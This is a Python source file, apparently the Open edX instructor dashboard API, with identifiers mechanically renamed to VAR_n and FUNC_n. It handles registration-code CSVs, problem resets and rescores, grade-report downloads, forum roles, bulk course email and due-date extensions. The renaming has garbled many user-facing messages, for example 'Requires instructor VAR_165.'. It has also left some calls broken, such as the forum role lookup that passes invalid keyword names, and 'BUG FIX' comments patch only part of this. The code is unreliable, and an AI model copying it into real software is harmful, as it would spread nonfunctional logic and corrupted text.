        VAR_0.exception('Exception at creating pdf file.')
        VAR_182 = None
    VAR_113 = theming_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
    VAR_114 = {
        'invoice': VAR_105,
        'site_name': VAR_108,
        'course': VAR_65,
        'course_price': VAR_107,
        'sub_total': VAR_107 * VAR_109,
        'discount': VAR_110,
        'sale_price': VAR_104,
        'quantity': VAR_109,
        'registration_codes': VAR_85,
        'currency_symbol': settings.PAID_COURSE_REGISTRATION_CURRENCY[1],
        'course_url': VAR_111,
        'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
        'dashboard_url': VAR_112,
        'contact_email': VAR_113,
        'corp_address': microsite.get_value('invoice_corp_address', settings.INVOICE_CORP_ADDRESS),
        'payment_instructions': microsite.get_value('invoice_payment_instructions', settings. INVOICE_PAYMENT_INSTRUCTIONS),
        'date': time.strftime("%m/%d/%Y")
    }
    VAR_115 = u'Confirmation and Invoice for {course_name}'.format(course_name=VAR_65.display_name)
    VAR_74 = render_to_string('emails/registration_codes_sale_email.txt', VAR_114)
    VAR_116 = render_to_string('emails/registration_codes_sale_invoice_attachment.txt', VAR_114)
    # Build the CSV attachment (code, redemption URL) in memory.
    VAR_117 = StringIO.StringIO()
    VAR_118 = VAR_26.writer(VAR_117)
    for registration_code in VAR_85:
        VAR_183 = 'http://{base_url}{redeem_code_url}'.format(
            base_url=microsite.get_value('SITE_NAME', settings.SITE_NAME),
            redeem_code_url=reverse('register_code_redemption', kwargs={'registration_code': registration_code.code})
        )
        VAR_118.writerow([registration_code.code, VAR_183])
    VAR_119 = microsite.get_value('finance_email', settings.FINANCE_EMAIL)
    if VAR_119:
        # BUG FIX: was `recipient_list.append(...)` — an undefined name.
        VAR_103.append(VAR_119)
    for recipient in VAR_103:
        VAR_14 = EmailMessage()
        VAR_14.subject = VAR_115
        VAR_14.body = VAR_74
        VAR_14.from_email = VAR_113
        VAR_14.to = [recipient]
        VAR_14.attach(u'RegistrationCodes.csv', VAR_117.getvalue(), 'text/csv')
        VAR_14.attach(u'Invoice.txt', VAR_116, 'text/plain')
        if VAR_182 is not None:
            VAR_14.attach(u'Invoice.pdf', VAR_182.getvalue(), 'application/pdf')
        else:
            VAR_198 = StringIO.StringIO(_('pdf download unavailable right now, please contact support.'))
            VAR_14.attach(u'pdf_unavailable.txt', VAR_198.getvalue(), 'text/plain')
        VAR_14.send()
    return FUNC_33("Registration_Codes.csv", VAR_85)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@require_POST
def FUNC_37(VAR_9, VAR_10):
    """Download a CSV of active (not-yet-redeemed) registration codes,
    optionally filtered by the posted `active_company_name`.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    # BUG FIX: the filter used `VAR_10=course_id` (undefined `course_id`),
    # and the later filters referenced the pre-rename name
    # `registration_codes_list`; all now use the defined locals.
    VAR_120 = CourseRegistrationCode.objects.filter(
        course_id=VAR_10
    ).order_by('invoice_item__invoice__company_name')
    VAR_88 = VAR_9.POST['active_company_name']
    if VAR_88:
        VAR_120 = VAR_120.filter(invoice_item__invoice__company_name=VAR_88)
    VAR_121 = RegistrationCodeRedemption.objects.select_related(
        'registration_code', 'registration_code__invoice_item__invoice'
    ).filter(registration_code__course_id=VAR_10)
    if VAR_121.exists():
        # Exclude every code that already has a redemption record.
        VAR_184 = [VAR_82.registration_code.code for VAR_82 in VAR_121]
        VAR_120 = VAR_120.exclude(code__in=VAR_184)
    return FUNC_33("Active_Registration_Codes.csv", VAR_120)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@require_POST
def FUNC_38(VAR_9, VAR_10):
    """Download a CSV of spent (already redeemed) registration codes,
    optionally filtered by the posted `spent_company_name`.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_121 = RegistrationCodeRedemption.objects.select_related('registration_code').filter(
        registration_code__course_id=VAR_10
    )
    VAR_122 = []
    if VAR_121.exists():
        # BUG FIX: the queryset filters used `VAR_10=course_id` (undefined
        # `course_id`) and the pre-rename name `spent_codes_list`; both now
        # use the defined locals.
        VAR_184 = [VAR_82.registration_code.code for VAR_82 in VAR_121]
        VAR_122 = CourseRegistrationCode.objects.filter(
            course_id=VAR_10, code__in=VAR_184
        ).order_by('invoice_item__invoice__company_name').select_related('invoice_item__invoice')
        VAR_88 = VAR_9.POST['spent_company_name']
        if VAR_88:
            VAR_122 = VAR_122.filter(invoice_item__invoice__company_name=VAR_88)  # pylint: disable=maybe-no-member
    VAR_34 = 'spent'
    return FUNC_33("Spent_Registration_Codes.csv", VAR_122, VAR_34)
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_39(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """Download a CSV mapping enrolled users to their anonymized IDs."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)

    def FUNC_85(VAR_123, VAR_86, VAR_124):
        """Build a UTF-8 encoded CSV attachment response."""
        VAR_185 = HttpResponse(content_type='text/csv')
        # BUG FIX: the Content-Disposition parameter must be `filename=`;
        # it had been mangled to `VAR_123=`, so browsers ignored the
        # suggested download name.
        VAR_185['Content-Disposition'] = 'attachment; filename={0}'.format(unicode(VAR_123).encode('utf-8'))
        VAR_186 = VAR_26.writer(VAR_185, dialect='excel', quotechar='"', quoting=VAR_26.QUOTE_ALL)
        VAR_187 = [unicode(s).encode('utf-8') for s in VAR_86]
        VAR_186.writerow(VAR_187)
        for row in VAR_124:
            VAR_187 = [unicode(s).encode('utf-8') for s in row]
            VAR_186.writerow(VAR_187)
        return VAR_185
    VAR_125 = User.objects.filter(
        courseenrollment__course_id=VAR_10,
    ).order_by('id')
    VAR_86 = ['User ID', 'Anonymized User ID', 'Course Specific Anonymized User ID']
    # save=False: report-only lookup, never mint new anonymous ids here.
    VAR_124 = [[s.id, unique_id_for_user(s, save=False), anonymous_id_for_user(s, VAR_10, save=False)] for s in VAR_125]
    return FUNC_85(VAR_10.to_deprecated_string().replace('/', '-') + '-anon-ids.csv', VAR_86, VAR_124)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_0
@FUNC_2('staff')
@FUNC_1(
    VAR_141="email or VAR_15 of VAR_40 for whom to get progress url"
)
def FUNC_40(VAR_9, VAR_10):
    """Return the progress-page URL for the student identified in the POST."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_19 = get_student_from_identifier(VAR_9.POST.get('unique_student_identifier'))
    # BUG FIX: Django's reverse() takes its URL arguments via the `kwargs`
    # keyword; the mangled `VAR_3=` keyword raised TypeError.
    VAR_126 = reverse('student_progress', kwargs={'course_id': VAR_10.to_deprecated_string(), 'student_id': VAR_19.id})
    VAR_63 = {
        'course_id': VAR_10.to_deprecated_string(),
        'progress_url': VAR_126,
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1(
    VAR_127="problem urlname to reset"
)
@FUNC_0
def FUNC_41(VAR_9, VAR_10):
    """Reset a problem's attempt count (optionally deleting module state)
    for one student, or queue a bulk reset for all students.

    Bulk resets and state deletion require instructor-level access.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_with_access(
        VAR_9.user, 'staff', VAR_10, depth=None
    )
    VAR_127 = strip_if_string(VAR_9.POST.get('problem_to_reset'))
    VAR_128 = VAR_9.POST.get('unique_student_identifier', None)
    VAR_40 = None
    if VAR_128 is not None:
        VAR_40 = get_student_from_identifier(VAR_128)
    VAR_129 = VAR_9.POST.get('all_students', False) in ['true', 'True', True]
    VAR_130 = VAR_9.POST.get('delete_module', False) in ['true', 'True', True]
    if VAR_129 and VAR_40:
        return HttpResponseBadRequest(
            "all_students and VAR_141 are mutually exclusive."
        )
    if VAR_129 and VAR_130:
        return HttpResponseBadRequest(
            "all_students and VAR_130 are mutually exclusive."
        )
    # Destructive / bulk operations need full instructor privileges.
    if VAR_129 or VAR_130:
        if not has_access(VAR_9.user, 'instructor', VAR_65):
            return HttpResponseForbidden("Requires instructor VAR_165.")
    try:
        VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_127)
    except InvalidKeyError:
        return HttpResponseBadRequest()
    VAR_63 = {}
    # BUG FIX: was `response_payload[...]` — an undefined name (NameError).
    VAR_63['problem_to_reset'] = VAR_127
    if VAR_40:
        try:
            # BUG FIX: the keyword/value pair was swapped
            # (`VAR_130=delete_module` with `delete_module` undefined);
            # the API keyword is `delete_module`, the local flag VAR_130.
            enrollment.reset_student_attempts(
                VAR_10,
                VAR_40,
                VAR_188,
                requesting_user=VAR_9.user,
                delete_module=VAR_130
            )
        except StudentModule.DoesNotExist:
            return HttpResponseBadRequest(_("Module does not exist."))
        except sub_api.SubmissionError:
            # BUG FIX: message text had been garbled ("An VAR_169 occurred").
            VAR_208 = _("An error occurred while deleting the score.")
            return HttpResponse(VAR_208, status=500)
        VAR_63['student'] = VAR_128
    elif VAR_129:
        instructor_task.api.submit_reset_problem_attempts_for_all_students(VAR_9, VAR_188)
        VAR_63['task'] = 'created'
        VAR_63['student'] = 'All Students'
    else:
        return HttpResponseBadRequest()
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_0
def FUNC_42(VAR_9, VAR_10):  # pylint: disable=invalid-VAR_16
    """Reset (or delete) entrance-exam state for one learner or everyone."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    course = get_course_with_access(
        VAR_9.user, 'staff', VAR_10, depth=None
    )
    if not course.entrance_exam_id:
        return HttpResponseBadRequest(
            _("Course has no entrance exam VAR_39.")
        )
    student_identifier = VAR_9.POST.get('unique_student_identifier', None)
    student = None
    if student_identifier is not None:
        student = get_student_from_identifier(student_identifier)
    all_students = VAR_9.POST.get('all_students', False) in ['true', 'True', True]
    delete_module = VAR_9.POST.get('delete_module', False) in ['true', 'True', True]
    # Bulk operation and single-learner targeting cannot be combined.
    if all_students and student:
        return HttpResponseBadRequest(
            _("all_students and VAR_141 are mutually exclusive.")
        )
    if all_students and delete_module:
        return HttpResponseBadRequest(
            _("all_students and VAR_130 are mutually exclusive.")
        )
    # Bulk resets and state deletion require full instructor privileges.
    if all_students or delete_module:
        if not has_access(VAR_9.user, 'instructor', course):
            return HttpResponseForbidden(_("Requires instructor VAR_165."))
    try:
        exam_key = VAR_10.make_usage_key_from_deprecated_string(course.entrance_exam_id)
        if delete_module:
            instructor_task.api.submit_delete_entrance_exam_state_for_student(VAR_9, exam_key, student)
        else:
            instructor_task.api.submit_reset_problem_attempts_in_entrance_exam(VAR_9, exam_key, student)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
    return JsonResponse({'student': student_identifier or _('All Students'), 'task': 'created'})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_1(VAR_127="problem urlname to reset")
@FUNC_0
def FUNC_43(VAR_9, VAR_10):
    """Queue a rescore of one problem, for a single student or for all."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_127 = strip_if_string(VAR_9.POST.get('problem_to_reset'))
    VAR_128 = VAR_9.POST.get('unique_student_identifier', None)
    VAR_40 = None
    if VAR_128 is not None:
        VAR_40 = get_student_from_identifier(VAR_128)
    VAR_129 = VAR_9.POST.get('all_students') in ['true', 'True', True]
    if not (VAR_127 and (VAR_129 or VAR_40)):
        return HttpResponseBadRequest("Missing query parameters.")
    if VAR_129 and VAR_40:
        return HttpResponseBadRequest(
            "Cannot rescore with VAR_129 and VAR_141."
        )
    try:
        VAR_188 = VAR_10.make_usage_key_from_deprecated_string(VAR_127)
    except InvalidKeyError:
        return HttpResponseBadRequest("Unable to parse problem id")
    VAR_63 = {}
    # BUG FIX: was `response_payload[...]` — an undefined name (NameError).
    VAR_63['problem_to_reset'] = VAR_127
    if VAR_40:
        VAR_63['student'] = VAR_128
        instructor_task.api.submit_rescore_problem_for_student(VAR_9, VAR_188, VAR_40)
        VAR_63['task'] = 'created'
    elif VAR_129:
        instructor_task.api.submit_rescore_problem_for_all_students(VAR_9, VAR_188)
        VAR_63['task'] = 'created'
    else:
        return HttpResponseBadRequest()
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('instructor')
@FUNC_0
def FUNC_44(VAR_9, VAR_10):
    """Queue a rescore of the entrance exam for one student or everyone."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    course = get_course_with_access(
        VAR_9.user, 'staff', VAR_10, depth=None
    )
    student_identifier = VAR_9.POST.get('unique_student_identifier', None)
    student = None
    if student_identifier is not None:
        student = get_student_from_identifier(student_identifier)
    all_students = VAR_9.POST.get('all_students') in ['true', 'True', True]
    if not course.entrance_exam_id:
        return HttpResponseBadRequest(
            _("Course has no entrance exam VAR_39.")
        )
    if all_students and student:
        return HttpResponseBadRequest(
            _("Cannot rescore with VAR_129 and VAR_141.")
        )
    try:
        exam_key = VAR_10.make_usage_key_from_deprecated_string(course.entrance_exam_id)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
    payload = {'student': student_identifier if student else _("All Students")}
    instructor_task.api.submit_rescore_entrance_exam_for_student(VAR_9, exam_key, student)
    payload['task'] = 'created'
    return JsonResponse(payload)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_45(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """List background bulk-email tasks previously run for this course."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_131 = 'bulk_course_email'
    # BUG FIX: the call passed `VAR_131=task_type` where `task_type` is an
    # undefined name; the external API's keyword is `task_type` and the
    # local value is VAR_131.
    VAR_132 = instructor_task.api.get_instructor_task_history(VAR_10, task_type=VAR_131)
    VAR_63 = {
        'tasks': map(extract_task_features, VAR_132),
    }
    return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_46(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """List the contents of bulk emails previously sent for this course."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_131 = 'bulk_course_email'
    # BUG FIX: the call passed `VAR_131=task_type` where `task_type` is an
    # undefined name; the external API's keyword is `task_type` and the
    # local value is VAR_131.
    VAR_133 = instructor_task.api.get_instructor_task_history(VAR_10, task_type=VAR_131)
    VAR_63 = {
        'emails': map(extract_email_features, VAR_133),
    }
    return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_47(VAR_9, VAR_10):
    """List instructor tasks: currently running ones, or the history for a
    specific problem (optionally narrowed to a single student)."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    problem_location = strip_if_string(VAR_9.POST.get('problem_location_str', False))
    student = VAR_9.POST.get('unique_student_identifier', None)
    if student is not None:
        student = get_student_from_identifier(student)
    # A student filter only makes sense together with a problem location.
    if student and not problem_location:
        return HttpResponseBadRequest(
            "unique_student_identifier must accompany problem_location_str"
        )
    if problem_location:
        try:
            module_key = VAR_10.make_usage_key_from_deprecated_string(problem_location)
        except InvalidKeyError:
            return HttpResponseBadRequest()
        if student:
            tasks = instructor_task.api.get_instructor_task_history(VAR_10, module_key, student)
        else:
            tasks = instructor_task.api.get_instructor_task_history(VAR_10, module_key)
    else:
        tasks = instructor_task.api.get_running_instructor_tasks(VAR_10)
    return JsonResponse({
        'tasks': map(extract_task_features, tasks),
    })
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_48(VAR_9, VAR_10):  # pylint: disable=invalid-VAR_16
    """List entrance-exam instructor tasks, optionally for one student."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    course = get_course_by_id(VAR_10)
    student = VAR_9.POST.get('unique_student_identifier', None)
    if student is not None:
        student = get_student_from_identifier(student)
    try:
        exam_key = VAR_10.make_usage_key_from_deprecated_string(course.entrance_exam_id)
    except InvalidKeyError:
        return HttpResponseBadRequest(_("Course has no valid entrance exam VAR_39."))
    if student:
        tasks = instructor_task.api.get_entrance_exam_instructor_task_history(VAR_10, exam_key, student)
    else:
        tasks = instructor_task.api.get_entrance_exam_instructor_task_history(VAR_10, exam_key)
    return JsonResponse({
        'tasks': map(extract_task_features, tasks),
    })
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_49(VAR_35, VAR_10):
    """List grade-report downloads available for the course."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_135 = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
    # BUG FIX: the dict was built as `dict(VAR_16=name, VAR_147=url, ...)`,
    # referencing the undefined names `name`/`url`; the loop variables
    # VAR_16/VAR_147 carry those values, and the payload keys the dashboard
    # consumes are `name` and `url`.
    VAR_63 = {
        'downloads': [
            dict(name=VAR_16, url=VAR_147, link=HTML('<a href="{}">{}</a>').format(HTML(VAR_147), Text(VAR_16)))
            for VAR_16, VAR_147 in VAR_135.links_for(VAR_10)
        ]
    }
    return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_5
def FUNC_50(VAR_35, VAR_10):
    """List financial-report downloads available for the course."""
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_135 = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
    # BUG FIX: the dict was built as `dict(VAR_16=name, VAR_147=url, ...)`,
    # referencing the undefined names `name`/`url`; the loop variables
    # VAR_16/VAR_147 carry those values, and the payload keys the dashboard
    # consumes are `name` and `url`.
    VAR_63 = {
        'downloads': [
            dict(name=VAR_16, url=VAR_147, link=HTML('<a href="{}">{}</a>').format(HTML(VAR_147), Text(VAR_16)))
            for VAR_16, VAR_147 in VAR_135.links_for(VAR_10)
        ]
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_51(VAR_9, VAR_10):
    """Submit the asynchronous ORA2 data-export task for the course."""
    VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_export_ora2_data(VAR_9, VAR_38)
        VAR_172 = _("The ORA VAR_192 report is being generated.")
        return JsonResponse({"status": VAR_172})
    except AlreadyRunningError:
        # Only one export task may run per course at a time; report it instead
        # of failing the request.
        VAR_196 = _(
            "An ORA VAR_192 report generation VAR_150 is already in "
            "progress. Check the 'Pending Tasks' table "
            "for the status of the VAR_150. When completed, the report "
            "will be available for download in the table below."
        )
        return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_52(VAR_9, VAR_10):
    """Submit the asynchronous grade-report CSV generation task for the course."""
    VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_calculate_grades_csv(VAR_9, VAR_38)
        VAR_172 = _("The grade report is being VAR_149."
                    " To view the status of the report, see Pending Tasks below.")
        return JsonResponse({"status": VAR_172})
    except AlreadyRunningError:
        # A duplicate submission is not an error from the user's point of view.
        VAR_196 = _("The grade report is currently being VAR_149."
                    " To view the status of the report, see Pending Tasks below."
                    " You will be able to download the report when it is complete.")
        return JsonResponse({"status": VAR_196})
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
def FUNC_53(VAR_9, VAR_10):
    """Submit the asynchronous problem-grade-report generation task for the course."""
    VAR_38 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    try:
        instructor_task.api.submit_problem_grade_report(VAR_9, VAR_38)
        VAR_172 = _("The problem grade report is being VAR_149."
                    " To view the status of the report, see Pending Tasks below.")
        return JsonResponse({"status": VAR_172})
    except AlreadyRunningError:
        # Report the in-progress task rather than raising.
        VAR_196 = _("A problem grade report is already being generated."
                    " To view the status of the report, see Pending Tasks below."
                    " You will be able to download the report when it is complete.")
        return JsonResponse({
            "status": VAR_196
        })
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('rolename')
def FUNC_54(VAR_9, VAR_10):
    """
    List the members of a discussion-forum role for the course.

    Requires instructor access, or staff access plus forum-admin rights;
    only full instructors may inspect the forum-administrator role itself.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_by_id(VAR_10)
    VAR_136 = has_access(VAR_9.user, 'instructor', VAR_65)
    VAR_137 = has_forum_access(
        VAR_9.user, VAR_10, FORUM_ROLE_ADMINISTRATOR
    )
    VAR_64 = VAR_9.POST.get('rolename')
    if not (VAR_137 or VAR_136):
        return HttpResponseBadRequest(
            "Operation requires staff & forum admin or instructor access"
        )
    # Guard: forum-admin membership is only visible to instructors.
    if VAR_64 == FORUM_ROLE_ADMINISTRATOR and not VAR_136:
        return HttpResponseBadRequest("Operation requires instructor VAR_165.")
    if VAR_64 not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
        return HttpResponseBadRequest(strip_tags(
            "Unrecognized VAR_64 '{}'.".format(VAR_64)
        ))
    try:
        VAR_190 = Role.objects.get(VAR_16=VAR_64, VAR_10=VAR_10)
        VAR_191 = VAR_190.users.all().order_by('username')
    except Role.DoesNotExist:
        # No one holds this role for the course yet.
        VAR_191 = []

    def FUNC_84(VAR_19):
        # Serialize just the user fields the dashboard table displays.
        return {
            'username': VAR_19.username,
            'email': VAR_19.email,
            'first_name': VAR_19.first_name,
            'last_name': VAR_19.last_name,
        }
    VAR_63 = {
        'course_id': VAR_10.to_deprecated_string(),
        VAR_64: map(FUNC_84, VAR_191),
    }
    return JsonResponse(VAR_63)
@transaction.non_atomic_requests
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1(send_to="sending to whom", VAR_115="subject line", VAR_74="message text")
def FUNC_55(VAR_9, VAR_10):
    """
    Create a CourseEmail record from the posted fields and submit the bulk
    course-email task. Returns 403 when bulk email is disabled for the course
    and 400 when the email record cannot be created.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    if not BulkEmailFlag.feature_enabled(VAR_10):
        return HttpResponseForbidden("Email is not enabled for this VAR_65.")
    VAR_138 = json.loads(VAR_9.POST.get("send_to"))
    VAR_115 = VAR_9.POST.get("subject")
    VAR_74 = VAR_9.POST.get("message")
    # Per-microsite overrides for the email template and From address.
    VAR_139 = microsite.get_value('course_email_template_name')
    VAR_140 = microsite.get_value('course_email_from_addr')
    try:
        # BUG FIX: the original passed `VAR_139=template_name, VAR_140=from_addr`
        # where `template_name`/`from_addr` are undefined names (NameError).
        # The keyword names belong on the left, the local values on the right.
        VAR_14 = CourseEmail.create(
            VAR_10,
            VAR_9.user,
            VAR_138,
            VAR_115, VAR_74,
            template_name=VAR_139,
            from_addr=VAR_140
        )
    except ValueError as err:
        return HttpResponseBadRequest(repr(err))
    instructor_task.api.submit_bulk_course_email(VAR_9, VAR_10, VAR_14.id)
    VAR_63 = {
        'course_id': VAR_10.to_deprecated_string(),
        'success': True,
    }
    return JsonResponse(VAR_63)
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1(
    VAR_141="email or VAR_15 of VAR_19 to change access",
    VAR_64="the forum role",
    VAR_57="'allow' or 'revoke'",
)
@FUNC_0
def FUNC_56(VAR_9, VAR_10):
    """
    Grant or revoke a discussion-forum role for one user.

    Same access rules as FUNC_54: instructor access, or staff plus
    forum-admin; only instructors may touch the forum-administrator role.
    """
    VAR_10 = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    VAR_65 = get_course_by_id(VAR_10)
    VAR_136 = has_access(VAR_9.user, 'instructor', VAR_65)
    VAR_137 = has_forum_access(
        VAR_9.user, VAR_10, FORUM_ROLE_ADMINISTRATOR
    )
    VAR_141 = VAR_9.POST.get('unique_student_identifier')
    VAR_64 = VAR_9.POST.get('rolename')
    VAR_57 = VAR_9.POST.get('action')
    if not (VAR_137 or VAR_136):
        return HttpResponseBadRequest(
            "Operation requires staff & forum admin or instructor access"
        )
    # Guard: only instructors can modify forum-admin membership.
    if VAR_64 == FORUM_ROLE_ADMINISTRATOR and not VAR_136:
        return HttpResponseBadRequest("Operation requires instructor VAR_165.")
    if VAR_64 not in [FORUM_ROLE_ADMINISTRATOR, FORUM_ROLE_MODERATOR, FORUM_ROLE_COMMUNITY_TA]:
        return HttpResponseBadRequest(strip_tags(
            "Unrecognized VAR_64 '{}'.".format(VAR_64)
        ))
    VAR_19 = get_student_from_identifier(VAR_141)
    try:
        update_forum_role(VAR_10, VAR_19, VAR_64, VAR_57)
    except Role.DoesNotExist:
        return HttpResponseBadRequest("Role does not exist.")
    VAR_63 = {
        'course_id': VAR_10.to_deprecated_string(),
        'action': VAR_57,
    }
    return JsonResponse(VAR_63)
@require_POST
def FUNC_57(VAR_9, VAR_10):  # pylint: disable=unused-argument
    """Report whether the requesting user wants a copy of sale invoices."""
    stored_pref = get_user_preference(VAR_9.user, INVOICE_KEY)
    # Default to True when the preference has never been stored.
    wants_copy = True if stored_pref is None else stored_pref == 'True'
    return JsonResponse({
        'invoice_copy': wants_copy
    })
def FUNC_58(VAR_36):
    """
    Human-readable label for a course unit: ``"display_name (location)"``
    when the unit has a non-empty display name, otherwise just its location.
    """
    display_name = getattr(VAR_36, 'display_name', None)
    if not display_name:
        return VAR_36.location.to_deprecated_string()
    return u'{0} ({1})'.format(display_name, VAR_36.location.to_deprecated_string())
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('student', 'url', 'due_datetime')
def FUNC_59(VAR_9, VAR_10):
    """Grant one student a due-date extension on one unit of the course."""
    VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
    VAR_40 = require_student_from_identifier(VAR_9.POST.get('student'))
    VAR_36 = find_unit(VAR_65, VAR_9.POST.get('url'))
    VAR_144 = parse_datetime(VAR_9.POST.get('due_datetime'))
    set_due_date_extension(VAR_65, VAR_36, VAR_40, VAR_144)
    # The response body is a plain translated confirmation string.
    return JsonResponse(_(
        'Successfully changed due date for VAR_40 {0} for {1} '
        'to {2}').format(VAR_40.profile.name, FUNC_58(VAR_36),
                         VAR_144.strftime('%Y-%m-%d %H:%M')))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('student', 'url')
def FUNC_60(VAR_9, VAR_10):
    """Reset a student's due-date extension on one unit back to the unit's own due date."""
    VAR_65 = get_course_by_id(SlashSeparatedCourseKey.from_deprecated_string(VAR_10))
    VAR_40 = require_student_from_identifier(VAR_9.POST.get('student'))
    VAR_36 = find_unit(VAR_65, VAR_9.POST.get('url'))
    # Passing None clears the extension.
    set_due_date_extension(VAR_65, VAR_36, VAR_40, None)
    if not getattr(VAR_36, "due", None):
        # The unit itself has no due date, so the extension was meaningless.
        return JsonResponse(
            _("Successfully removed invalid due date extension (VAR_36 has no due date).")
        )
    VAR_145 = VAR_36.due.strftime('%Y-%m-%d %H:%M')
    return JsonResponse(_(
        'Successfully reset due date for VAR_40 {0} for {1} '
        'to {2}').format(VAR_40.profile.name, FUNC_58(VAR_36),
                         VAR_145))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('url')
def FUNC_61(VAR_9, VAR_10):
    """Dump all due-date extensions granted on the posted unit of this course."""
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    course = get_course_by_id(course_key)
    unit = find_unit(course, VAR_9.POST.get('url'))
    return JsonResponse(dump_module_extensions(course, unit))
@handle_dashboard_error
@require_POST
@ensure_csrf_cookie
@cache_control(no_cache=True, no_store=True, must_revalidate=True)
@FUNC_2('staff')
@FUNC_1('student')
def FUNC_62(VAR_9, VAR_10):
    """Dump all due-date extensions granted to the posted student in this course."""
    course_key = SlashSeparatedCourseKey.from_deprecated_string(VAR_10)
    student = require_student_from_identifier(VAR_9.POST.get('student'))
    course = get_course_by_id(course_key)
    return JsonResponse(dump_student_extensions(course, student))
def FUNC_63(VAR_37):
